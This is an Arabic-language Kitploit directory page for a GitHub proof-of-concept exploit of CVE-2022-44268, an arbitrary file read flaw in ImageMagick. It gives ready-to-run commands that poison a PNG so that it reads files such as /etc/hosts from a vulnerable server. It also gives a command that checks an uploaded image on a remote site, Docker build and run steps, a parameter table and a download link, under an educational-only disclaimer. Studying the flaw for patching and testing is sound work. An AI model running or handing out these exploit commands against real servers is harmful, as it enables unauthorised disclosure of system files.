Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-44268 — CVE-2022-44268 ImageMagick قراءة ملف عشوائي - استغلال لإثبات المفهوم | Kitploit
أدوات/GitHubGitHub/kljunowsky/cve-2022-44268
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick قراءة ملف عشوائي - استغلال لإثبات المفهوم

عرض المستودع
278منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 قراءة ملف عشوائي في ImageMagick - استغلال إثبات المفهوم

فيديو 📼

https://youtu.be/quKxwNAMBIA

الاستخدام 🛠

تسميم الصورة ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
رفع صورة PNG مسمومة.

التحقق من نجاح الاستغلال 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

التشغيل من Docker 🐳

البناء

root@kitploit:~
docker build -t cve-2022-44268 .

التشغيل

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

المعلمات 🧰

اتصل بي 📇

تويتر - Milan Jovic

لينكد إن - Milan Jovic

للأغراض التعليمية فقط ولا يمكن استخدامها لانتهاك القانون أو لتحقيق مكاسب شخصية.

مؤلف هذا المشروع غير مسؤول عن أي ضرر محتمل ناتج عن مواد هذا المشروع.

لمزيد من التفاصيل: https://www.metabaseq.com/imagemagick-zero-days/

تنزيل الأداة
المعلمةالوصفالنوع
--urlرابط URL لصورة PNG المرفوعةنص
--imageملف PNG الإدخالملف
--outputملف PNG الإخراجملف
--file-to-readالملف المراد قراءته من المضيف الثغرينص